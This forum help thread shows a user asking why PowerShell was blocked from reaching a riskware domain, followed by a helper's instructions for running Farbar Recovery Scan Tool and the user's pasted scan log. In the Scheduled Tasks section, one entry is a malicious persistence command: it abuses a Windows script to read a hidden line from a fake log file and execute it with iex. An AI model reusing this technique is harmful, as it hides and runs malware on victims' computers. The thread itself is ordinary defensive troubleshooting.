Jump to content

Recommended Posts

Hello! New to the board here. I keep getting a popup from the malwarebytes notification stating I have a riskware problem. Could anyone enlighten me on what's below? The domain name doesn't exist, the malicious website is my powershell... am I a victim of a cyber attack or what's going on here? 

 

Please let me know! Thank you. 

 

 

-Log Details-
Protection Event Date: 10/6/21
Protection Event Time: 1:11 PM
Log File: 2b7dad48-26d9-11ec-87a2-bc5ff42b1b34.json

 

-System Information-
OS: Windows 10 (Build 19042.985)
CPU: x64
File System: NTFS
User: System

-Blocked Website Details-
Malicious Website: 1
, C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Blocked, -1, -1, 0.0.0, , 

-Website Data-
Category: RiskWare
Domain: ai.backend-chat.com
IP Address: 172.67.170.251
Port: 443
Type: Outbound
File: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

(end)

Link to post
Share on other sites

Hello colbski and welcome to Malwarebytes,

Disable smart screen ONLY if it interferes with software we may have to use:

https://support.microsoft.com/en-us/microsoft-edge/what-is-smartscreen-and-how-can-it-help-protect-me-1c9a874a-6826-be5e-45b1-67fa445a74c8

Please remember to enable when we are finished....

Next,

Disable any Anti-virus software you have installed ONLY if it stops software we may use from working:

https://www.bleepingcomputer.com/forums/t/114351/how-to-temporarily-disable-your-anti-virus-firewall-and-anti-malware-programs/

Please remember to enable AV software when we are finished running scans....

Run the following scan, lets see if anything shows up:

Download Farbar Recovery Scan Tool and save it to your desktop.

Alternative download option: http://www.techspot.com/downloads/6731-farbar-recovery-scan-tool.html

Note: You need to run the version compatible with your system (32 bit or 64 bit). If you are not sure which version applies to your system download both of them and try to run them. Only one of them will run on your system, that will be the right version.

If your security alerts to FRST either, accept the alert or turn your security off to allow FRST to run. It is not malicious or infected in any way...

Be aware FRST must be run from an account with Administrator status... If English is not your primary language Right click on FRST/FRST64 and rename FRSTEnglish/FRST64English

 
  • Double-click to run it. When the tool opens click Yes to disclaimer.(Windows 8/10 users will be prompted about Windows SmartScreen protection - click More information and Run.)
  • Make sure Addition.txt is checkmarked under "Optional scans"
    user posted image
     
  • Press Scan button to run the tool....
  • It will make a log (FRST.txt) in the same directory the tool is run. Please copy and paste it to your reply.
  • The tool will also make a log named (Addition.txt) Please attach that log to your reply.


Thank you,

Kevin
Link to post
Share on other sites

  • AdvancedSetup changed the title to Riskware block ai.backend-chat

Thanks for the rapid response. Here you go. Still trying to find the addtions.txt form.

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 06-10-2021
Ran by User (administrator) on DESKTOP-69OG4GS (06-10-2021 13:47:19)
Running from C:\Users\User\AppData\Local\Temp\scoped_dir5424_581234476
Loaded Profiles: User
Platform: Windows 10 Pro Version 20H2 19042.985 (X64) Language: English (United States)
Default browser: Opera
Boot Mode: Normal

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
(Apple Inc.) C:\Program Files\WindowsApps\AppleInc.iTunes_12121.1.54014.0_x64__nzyj5cx40ttqa\AMDS64\AppleMobileDeviceProcess.exe
(Flexera Software LLC -> Flexera) C:\Program Files (x86)\Common Files\Macrovision Shared\FlexNet Publisher\FNPLicensingService.exe
(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\igfxEM.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Users\User\AppData\Local\Microsoft\OneDrive\OneDrive.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\oobe\UserOOBEBroker.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2109.6-0\MsMpEng.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe <2>
(Opera Software AS -> Opera Software) C:\Program Files\Opera\79.0.4143.72\opera_crashreporter.exe
(Opera Software AS -> Opera Software) C:\Program Files\Opera\opera.exe <14>
(Piriform Software Ltd -> Piriform Software Ltd) C:\Program Files\CCleaner\CCleaner64.exe <2>
(Riot Games, Inc. -> Riot Games, Inc.) C:\Program Files\Riot Vanguard\vgc.exe

==================== Registry (Whitelisted) ===================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [Riot Vanguard] => C:\Program Files\Riot Vanguard\vgtray.exe [3086208 2021-06-22] (Riot Games, Inc. -> Riot Games, Inc.)
HKLM-x32\...\Run: [Opera Browser Assistant] => C:\Program Files\Opera\assistant\browser_assistant.exe [4105424 2021-10-05] (Opera Software AS -> Opera Software)
HKU\S-1-5-21-1006842105-1920769258-2521470405-1001\...\Run: [CCleaner Smart Cleaning] => C:\Program Files\CCleaner\CCleaner64.exe [27775672 2020-05-01] (Piriform Software Ltd -> Piriform Software Ltd)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\94.0.4606.71\Installer\chrmstp.exe [2021-10-05] (Google LLC -> Google LLC)
GroupPolicy: Restriction ? <==== ATTENTION
Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION
HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION

==================== Scheduled Tasks (Whitelisted) ============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {1C428E84-20DA-494F-B043-F1B80707E9D7} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [913448 2019-10-16] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {258116A2-BD82-4698-9403-CE25E42EAEF1} - System32\Tasks\Microsoft\Windows\NetService\Network\NetServices => C:\Windows\System32\SyncAppvPublishingServer.vbs [1720 2019-12-07] (Microsoft Windows -> ) -> "n; $a = Get-Content "C:\Users\User\AppData\Local\logs\system-logs.txt" | Select -Index 17033;iex $a;hackbacktrack XoBJLWeei4NqeQuFneR9fArkoDLpp4Tj+YZu2tRZg3I=
Task: {2C828134-FA7B-42D7-88F5-87C979A820A9} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [686384 2020-05-01] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {3DEFA8CB-B32C-4608-8BF5-372BA3757863} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [52104 2017-09-22] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
Task: {43AFAB59-CECD-4D83-8B39-9D52AC88640A} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [155592 2020-12-30] (Google LLC -> Google LLC)
Task: {443739FD-902C-4413-92E2-A2B9D521B3F8} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2109.6-0\MpCmdRun.exe [884544 2021-10-06] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {488D1354-4F30-45B0-ACB5-D33F70DF31CA} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2109.6-0\MpCmdRun.exe [884544 2021-10-06] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {6CFD9559-9B31-4D39-AEBB-C7B9114CCBF3} - System32\Tasks\Opera scheduled Autoupdate 1531693452 => C:\Program Files\Opera\launcher.exe [42731728 2021-09-28] (Opera Software AS -> Opera Software)
Task: {7ED8DFD7-FBC5-4275-9F54-21A74385AF37} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2109.6-0\MpCmdRun.exe [884544 2021-10-06] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {8BF3D2D1-C2A4-41E7-90F5-5ED824091E6F} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [155592 2020-12-30] (Google LLC -> Google LLC)
Task: {91F1BE2B-4FD7-4CFD-8BFB-5FA1A7D50D68} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [23571128 2020-05-01] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {BDB9CF21-5F30-49E9-A130-ACA8FC245AEC} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1562376 2021-08-16] (Adobe Inc. -> Adobe Inc.)
Task: {C963BF0C-DAAA-4772-BB45-1E812E079F22} - System32\Tasks\Microsoft\Windows\termsrv\RemoteFX\RemoteFXvGPUDisableTask => C:\WINDOWS\System32\RemoteFXvGPUDisablement.exe
Task: {D20CFA1C-3164-4E60-AF37-ABFDFAE60CED} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [913448 2019-10-16] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {D405BA4A-2F53-48A0-ADC0-35AD9252F54C} - System32\Tasks\Microsoft\Windows\termsrv\RemoteFX\RemoteFXWarningTask => C:\WINDOWS\System32\RemoteFXvGPUDisablement.exe
Task: {DA484D77-30F9-4609-977D-6D03BBF981E6} - System32\Tasks\Opera scheduled assistant Autoupdate 1583006413 => C:\Program Files\Opera\launcher.exe [42731728 2021-09-28] (Opera Software AS -> Opera Software) -> --scheduledautoupdate --component-name=assistant --component-path="C:\Program Files\Opera\assistant" $(Arg0)
Task: {DE52A56D-09CB-4603-A5E8-7512DA4F6DB2} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2109.6-0\MpCmdRun.exe [884544 2021-10-06] (Microsoft Windows Publisher -> Microsoft Corporation)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)


==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{3ace03f1-d928-4108-8ab2-5b15714db44e}: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{c5774c7e-5898-47ee-97ea-2fbac7aff309}: [DhcpNameServer] 10.10.0.1

Edge: 
=======
Edge Extension: (No Name) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [not found]
Edge Extension: (No Name) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [not found]
Edge Extension: (No Name) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [not found]
Edge Extension: (No Name) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [not found]
Edge Profile: C:\Users\User\AppData\Local\Microsoft\Edge\User Data\Default [2021-10-04]

FireFox:
========
FF HKU\S-1-5-21-1006842105-1920769258-2521470405-1001\...\Firefox\Extensions: [acewebextension_unlisted@acestream.org] - C:\Users\User\AppData\Roaming\ACEStream\extensions\awe\firefox\acewebextension_unlisted.xpi
FF Extension: (Ace Script) - C:\Users\User\AppData\Roaming\ACEStream\extensions\awe\firefox\acewebextension_unlisted.xpi [2018-11-26]
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2021-09-24] (Adobe Inc. -> Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-1006842105-1920769258-2521470405-1001: @acestream.net/acestreamplugin,version=3.1.32 -> C:\Users\User\AppData\Roaming\ACEStream\player\npace_plugin.dll [2017-01-13] (Innovative Digital Technologies -> Innovative Digital Technologies)

Chrome: 
=======
CHR Profile: C:\Users\User\AppData\Local\Google\Chrome\User Data\DEFAULT [2021-10-04]
CHR Extension: (Docs) - C:\Users\User\AppData\Local\Google\Chrome\User Data\DEFAULT\Extensions\aohghmighlieiainnegkcijnfilokake [2018-07-15]
CHR Extension: (Google Drive) - C:\Users\User\AppData\Local\Google\Chrome\User Data\DEFAULT\Extensions\apdfllckaahabafndbhieahigkjlhalf [2020-11-15]
CHR Extension: (Pop up blocker for Chrome™ - Poper Blocker) - C:\Users\User\AppData\Local\Google\Chrome\User Data\DEFAULT\Extensions\bkkbcggnhapdmkeljlodobbkopceiche [2021-09-19]
CHR Extension: (YouTube) - C:\Users\User\AppData\Local\Google\Chrome\User Data\DEFAULT\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-07-15]
CHR Extension: (Adobe Acrobat) - C:\Users\User\AppData\Local\Google\Chrome\User Data\DEFAULT\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2021-08-02]
CHR Extension: (FantasyPros: Win your Fantasy League) - C:\Users\User\AppData\Local\Google\Chrome\User Data\DEFAULT\Extensions\gfbepnlhpkbgbkcebjnfhgjckibfdfkc [2021-09-28]
CHR Extension: (Google Docs Offline) - C:\Users\User\AppData\Local\Google\Chrome\User Data\DEFAULT\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2021-09-28]
CHR Extension: (Avast Online Security) - C:\Users\User\AppData\Local\Google\Chrome\User Data\DEFAULT\Extensions\gomekmidlodglbbmalcneegieacbdmki [2021-04-05]
CHR Extension: (Ace Script) - C:\Users\User\AppData\Local\Google\Chrome\User Data\DEFAULT\Extensions\mjbepbhonbojpoaenhckjocchgfiaofo [2018-12-29]
CHR Extension: (Chrome Web Store Payments) - C:\Users\User\AppData\Local\Google\Chrome\User Data\DEFAULT\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2021-04-05]
CHR Extension: (Gmail) - C:\Users\User\AppData\Local\Google\Chrome\User Data\DEFAULT\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2020-11-15]
CHR HKU\S-1-5-21-1006842105-1920769258-2521470405-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [mjbepbhonbojpoaenhckjocchgfiaofo]
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj]
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki]

Opera: 
=======
OPR Profile: C:\Users\User\AppData\Roaming\Opera Software\Opera Stable [2021-10-06]
OPR DefaultSuggestURL: Opera Stable -> hxxps://www.google.com/complete/search?client=opera&q={searchTerms}&ie={inputEncoding}&oe={outputEncoding}
OPR Extension: (Rich Hints Agent) - C:\Users\User\AppData\Roaming\Opera Software\Opera Stable\Extensions\enegjkbbakeegngfapepobipndnebkdk [2021-09-29]
OPR Extension: (Popup Blocker (strict)) - C:\Users\User\AppData\Roaming\Opera Software\Opera Stable\Extensions\jabcemjkhjfpkhakphioakkhcnbgeomm [2021-09-19]
OPR Extension: (Amazon Assistant Promotion) - C:\Users\User\AppData\Roaming\Opera Software\Opera Stable\Extensions\kbmoiomgmchbpihhdpabemajcbjpcijk [2021-09-01]

==================== Services (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [169728 2021-08-16] (Adobe Inc. -> Adobe Inc.)
S3 FACEITService; C:\Program Files\FACEIT AC\FACEITService.exe [23341512 2021-10-06] (FACE IT LIMITED -> )
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [5393288 2021-05-15] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 vgc; C:\Program Files\Riot Vanguard\vgc.exe [10147296 2021-06-22] (Riot Games, Inc. -> Riot Games, Inc.)
S3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2109.6-0\NisSrv.exe [2855512 2021-10-06] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2109.6-0\MsMpEng.exe [128392 2021-10-06] (Microsoft Windows Publisher -> Microsoft Corporation)

===================== Drivers (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R0 AsrRamDisk; C:\WINDOWS\System32\drivers\AsrRamDisk.sys [40200 2014-07-30] (ASROCK Incorporation -> ASRock Inc.)
R2 BdDci; C:\WINDOWS\system32\DRIVERS\bddci.sys [800672 2021-08-26] (Microsoft Windows Hardware Compatibility Publisher -> Bitdefender)
S3 bduefiscan; C:\WINDOWS\system32\DRIVERS\bduefiscan.sys [55864 2021-07-09] (Bitdefender SRL -> Bitdefender)
S3 edrsensor; C:\WINDOWS\System32\DRIVERS\edrsensor.sys [309120 2020-02-03] (Bitdefender SRL -> BitDefender S.R.L. Bucharest, ROMANIA)
R0 FACEIT; C:\WINDOWS\System32\Drivers\FACEIT.sys [12566520 2021-10-01] (Microsoft Windows Hardware Compatibility Publisher -> )
S3 logi_joy_bus_enum; C:\WINDOWS\system32\drivers\logi_joy_bus_enum.sys [32448 2020-09-19] (WDKTestCert sqa,131523902232810150 -> Logitech, Inc.)
S3 logi_joy_xlcore; C:\WINDOWS\system32\drivers\logi_joy_xlcore.sys [61288 2020-09-19] (WDKTestCert sqa,131523902232810150 -> Logitech, Inc.)
S3 RTCore64; C:\Program Files (x86)\MSI Afterburner\RTCore64.sys [14024 2017-08-27] (MICRO-STAR INTERNATIONAL CO., LTD. -> )
S3 RZSURROUNDVADService; C:\WINDOWS\system32\drivers\RzSurroundVAD.sys [49176 2016-10-16] (Razer USA Ltd. -> Windows (R) Win 7 DDK provider)
S3 sthid; C:\WINDOWS\System32\drivers\sthid.sys [21216 2017-11-01] (Splashtop Inc. -> Splashtop Inc.)
S3 tapprotonvpn; C:\WINDOWS\System32\drivers\tapprotonvpn.sys [49024 2021-05-28] (Microsoft Windows Hardware Compatibility Publisher -> The OpenVPN Project)
R1 vgk; C:\Program Files\Riot Vanguard\vgk.sys [8241992 2021-06-22] (Riot Games, Inc. -> Riot Games, Inc.)
R0 vlflt; C:\WINDOWS\System32\DRIVERS\vlflt.sys [481696 2021-09-01] (Microsoft Windows Hardware Compatibility Publisher -> Bitdefender)
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [48520 2021-10-06] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [434424 2021-10-06] (Microsoft Windows -> Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [86264 2021-10-06] (Microsoft Windows -> Microsoft Corporation)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One month (created) (Whitelisted) =========

(If an entry is included in the fixlist, the file/folder will be moved.)

2021-10-06 13:46 - 2021-10-06 13:47 - 000000000 ____D C:\FRST
2021-10-06 13:46 - 2021-10-06 13:46 - 002308096 _____ (Farbar) C:\Users\User\Desktop\FRST64.exe
2021-10-06 13:46 - 2021-10-06 13:46 - 002019328 _____ (Farbar) C:\Users\User\Desktop\FRST.exe
2021-10-06 13:45 - 2021-10-06 13:45 - 000000000 _____ C:\Users\User\Desktop\FRST.exe (1).opdownload
2021-10-06 13:43 - 2021-10-06 13:43 - 000000000 _____ C:\Users\User\Desktop\FRST.exe.opdownload
2021-10-06 11:51 - 2021-10-06 11:51 - 000072516 _____ C:\ProgramData\agent.uninstall.1633542670.bdinstall.v2.bin
2021-10-06 11:50 - 2021-10-06 11:50 - 002101944 _____ (Malwarebytes) C:\Users\User\Desktop\MBSetup-119967.119967-consumer.exe
2021-10-06 11:50 - 2021-10-06 11:50 - 000001196 _____ C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Bitdefender Antivirus Free.lnk
2021-10-06 11:49 - 2021-10-06 11:49 - 000000000 ____D C:\ProgramData\48C4687D-9760-4F5B-BAB3-60351B0841E4
2021-10-06 11:48 - 2021-10-06 11:48 - 000000000 ____D C:\ProgramData\Bitdefender
2021-10-06 11:48 - 2021-09-01 12:47 - 000481696 _____ (Bitdefender) C:\WINDOWS\system32\Drivers\vlflt.sys
2021-10-06 11:48 - 2021-08-26 15:48 - 000800672 _____ (Bitdefender) C:\WINDOWS\system32\Drivers\bddci.sys
2021-10-06 11:48 - 2021-08-23 06:04 - 001183128 _____ (BitDefender S.R.L. Bucharest, ROMANIA) C:\WINDOWS\system32\Drivers\gemma.sys
2021-10-06 11:48 - 2021-08-17 06:02 - 003707800 _____ (Bitdefender S.R.L. Bucharest, ROMANIA) C:\WINDOWS\system32\Drivers\atc.sys
2021-10-06 11:48 - 2021-07-21 16:24 - 000615328 _____ (Bitdefender) C:\WINDOWS\system32\Drivers\trufos.sys
2021-10-06 11:48 - 2021-07-09 01:36 - 000055864 _____ (Bitdefender) C:\WINDOWS\system32\Drivers\bduefiscan.sys
2021-10-06 11:48 - 2020-02-03 16:53 - 000309120 _____ (BitDefender S.R.L. Bucharest, ROMANIA) C:\WINDOWS\system32\Drivers\edrsensor.sys
2021-10-06 11:47 - 2021-10-06 13:26 - 000000000 ____D C:\Program Files\Bitdefender Antivirus Free
2021-10-06 11:47 - 2021-10-06 11:51 - 000000000 ____D C:\Program Files\Bitdefender Agent
2021-10-06 11:47 - 2021-10-06 11:47 - 000116464 _____ C:\ProgramData\agent.1633542438.bdinstall.v2.bin
2021-10-06 11:47 - 2021-10-06 11:47 - 000000000 ____D C:\ProgramData\Bitdefender Agent
2021-10-06 11:04 - 2021-10-06 11:04 - 000000000 ____D C:\Program Files\Malwarebytes
2021-10-06 10:57 - 2021-10-06 11:00 - 000000000 ____D C:\Users\User\Downloads\Like Moths To Flames - An Eye For An Eye (2013) M4a 320Kbps R3D SilverRG
2021-10-06 10:53 - 2021-10-06 10:54 - 000000000 ____D C:\Users\User\Downloads\Nitro Pro 13.49.2.993 Enterprise  Retail + crack {PROAC12}
2021-10-06 10:52 - 2021-10-06 10:52 - 000000000 ____D C:\Users\User\Downloads\Saosin - Along the Shadow (Deluxe) (2016) [MP3~320Kbps]~[Hunter] [FRG]
2021-10-06 09:59 - 2021-10-06 10:58 - 000000000 ____D C:\Users\User\AppData\Local\Downloaded Installations
2021-10-06 09:59 - 2021-10-06 09:59 - 000000000 ____D C:\ProgramData\Nitro
2021-10-06 09:59 - 2021-10-06 09:59 - 000000000 ____D C:\Program Files\Nitro
2021-10-06 09:57 - 2021-10-06 09:57 - 000000000 ____D C:\Users\User\AppData\Roaming\Nitro
2021-10-06 09:44 - 2021-10-06 11:47 - 000000000 ____D C:\Users\User\Desktop\newdot
2021-10-05 21:00 - 2021-10-05 21:00 - 000000000 ____D C:\Users\User\AppData\Local\D290DB.tmpd
2021-10-05 21:00 - 2021-10-05 21:00 - 000000000 _____ C:\Users\User\AppData\Local\D290DB.tmp
2021-10-05 13:24 - 2021-10-05 13:24 - 000418841 _____ C:\Users\User\Documents\HALLIBURTONESdot.pdf
2021-10-05 11:58 - 2021-10-05 11:58 - 000000000 ____D C:\Users\User\AppData\Local\D27C45.tmpd
2021-10-05 11:58 - 2021-10-05 11:58 - 000000000 _____ C:\Users\User\AppData\Local\D27C45.tmp
2021-10-05 08:28 - 2021-10-05 13:25 - 000000000 ____D C:\Users\User\Desktop\DOT
2021-10-05 08:22 - 2021-10-05 12:26 - 000411275 _____ C:\Users\User\Downloads\DOT FMCSA Release - 3 Year v5.08.23 _form (1).pdf
2021-10-05 08:21 - 2021-10-05 08:21 - 000387158 _____ C:\Users\User\Downloads\DOT FMCSA Release - 3 Year v5.08.23 _form.pdf
2021-10-04 19:10 - 2021-10-04 19:10 - 000000000 ____D C:\Users\User\AppData\Local\D243BC.tmpd
2021-10-04 19:10 - 2021-10-04 19:10 - 000000000 _____ C:\Users\User\AppData\Local\D243BC.tmp
2021-10-04 16:29 - 2021-10-04 16:29 - 000000000 ____D C:\Users\User\AppData\Local\D2EBB3.tmpd
2021-10-04 16:29 - 2021-10-04 16:29 - 000000000 _____ C:\Users\User\AppData\Local\D2EBB3.tmp
2021-10-04 15:30 - 2021-10-05 11:55 - 000000000 ____D C:\Users\User\AppData\Local\D2647.tmpd
2021-10-04 15:30 - 2021-10-05 11:55 - 000000000 ____D C:\Users\User\AppData\Local\D21F5E.tmpd
2021-10-04 15:30 - 2021-10-04 15:30 - 000000000 _____ C:\Users\User\AppData\Local\D2647.tmp
2021-10-04 15:30 - 2021-10-04 15:30 - 000000000 _____ C:\Users\User\AppData\Local\D21F5E.tmp
2021-10-04 15:25 - 2021-10-04 15:25 - 000001309 _____ C:\BnetLog.txt
2021-10-04 15:25 - 2021-10-04 15:25 - 000000000 ____D C:\Users\User\Documents\Diablo II
2021-10-04 15:24 - 2021-10-04 15:24 - 000001198 _____ C:\Users\Public\Desktop\Diablo II - Lord of Destruction.lnk
2021-10-04 15:24 - 2021-10-04 15:24 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Diablo II
2021-10-04 15:23 - 2021-10-05 21:00 - 000000000 ____D C:\Program Files (x86)\Diablo II
2021-09-24 16:09 - 2021-09-24 16:09 - 000065291 _____ C:\Users\User\Downloads\-5278170232392415309.PDF
2021-09-24 16:09 - 2021-09-24 16:09 - 000040063 _____ C:\Users\User\Downloads\-7957964943521938263.pdf
2021-09-24 15:51 - 2021-09-24 15:51 - 000087110 _____ C:\Users\User\Downloads\-5146372055576612323.PDF
2021-09-24 15:45 - 2021-09-24 15:45 - 000365632 _____ C:\Users\User\Downloads\-8713336288066998934.pdf
2021-09-24 15:13 - 2021-09-24 15:13 - 000010412 _____ C:\Users\User\Downloads\pay_statements.zip
2021-09-24 15:13 - 2021-09-24 15:13 - 000000000 ____D C:\Users\User\Desktop\2021 paystubs
2021-09-18 13:31 - 2021-09-18 13:31 - 000069683 _____ C:\Users\User\Desktop\Access Idaho Services driver record.pdf
2021-09-16 12:37 - 2021-09-24 20:36 - 000000802 _____ C:\Users\User\Desktop\republic services.txt
2021-09-16 12:35 - 2021-09-16 12:35 - 000001388 _____ C:\Users\User\Desktop\grasmick produce.txt

==================== One month (modified) ==================

(If an entry is included in the fixlist, the file/folder will be moved.)

2021-10-06 13:43 - 2019-12-07 03:14 - 000000000 ____D C:\WINDOWS\AppReadiness
2021-10-06 13:43 - 2019-12-07 03:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2021-10-06 13:38 - 2019-12-07 03:14 - 000000000 ___HD C:\WINDOWS\ELAMBKUP
2021-10-06 13:37 - 2018-07-18 21:52 - 000000000 ____D C:\Users\User\AppData\Local\CrashDumps
2021-10-06 13:32 - 2021-05-15 10:44 - 000795738 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2021-10-06 13:32 - 2019-12-07 03:13 - 000000000 ____D C:\WINDOWS\INF
2021-10-06 13:31 - 2018-07-15 16:23 - 000000000 ____D C:\Program Files (x86)\Google
2021-10-06 13:30 - 2020-04-15 14:33 - 000000001 _____ C:\WINDOWS\vgkbootstatus.dat
2021-10-06 13:28 - 2021-05-15 10:49 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2021-10-06 13:28 - 2018-07-14 17:04 - 000000000 ____D C:\ProgramData\NVIDIA
2021-10-06 13:28 - 2018-07-06 19:04 - 000000000 __SHD C:\Users\User\IntelGraphicsProfiles
2021-10-06 13:27 - 2021-05-15 10:24 - 000008192 ___SH C:\DumpStack.log.tmp
2021-10-06 13:26 - 2019-12-07 03:03 - 000524288 _____ C:\WINDOWS\system32\config\BBI
2021-10-06 13:26 - 2019-12-07 03:03 - 000032768 _____ C:\WINDOWS\system32\config\ELAM
2021-10-06 13:10 - 2018-09-09 09:03 - 000000000 ____D C:\Users\User\AppData\Roaming\FACEIT
2021-10-06 12:16 - 2018-07-06 19:46 - 000000000 ____D C:\WINDOWS\system32\Drivers\wd
2021-10-06 12:14 - 2018-09-16 22:04 - 000000000 ____D C:\Program Files\FACEIT AC
2021-10-06 11:45 - 2019-12-07 03:14 - 000000000 ___HD C:\Program Files\WindowsApps
2021-10-06 11:13 - 2018-07-15 16:13 - 000000000 ____D C:\Program Files\Opera
2021-10-06 11:03 - 2019-02-02 14:10 - 000000000 ____D C:\Users\User\AppData\Roaming\uTorrent
2021-10-06 11:01 - 2020-04-05 13:43 - 000000000 ____D C:\Users\User\Desktop\Job stuff
2021-10-06 10:53 - 2019-04-20 16:16 - 000000000 ____D C:\Users\User\AppData\Local\BitTorrentHelper
2021-10-06 10:53 - 2018-07-01 16:29 - 000000000 ____D C:\ProgramData\Package Cache
2021-10-05 22:59 - 2018-07-15 15:55 - 000000000 ____D C:\Program Files (x86)\Steam
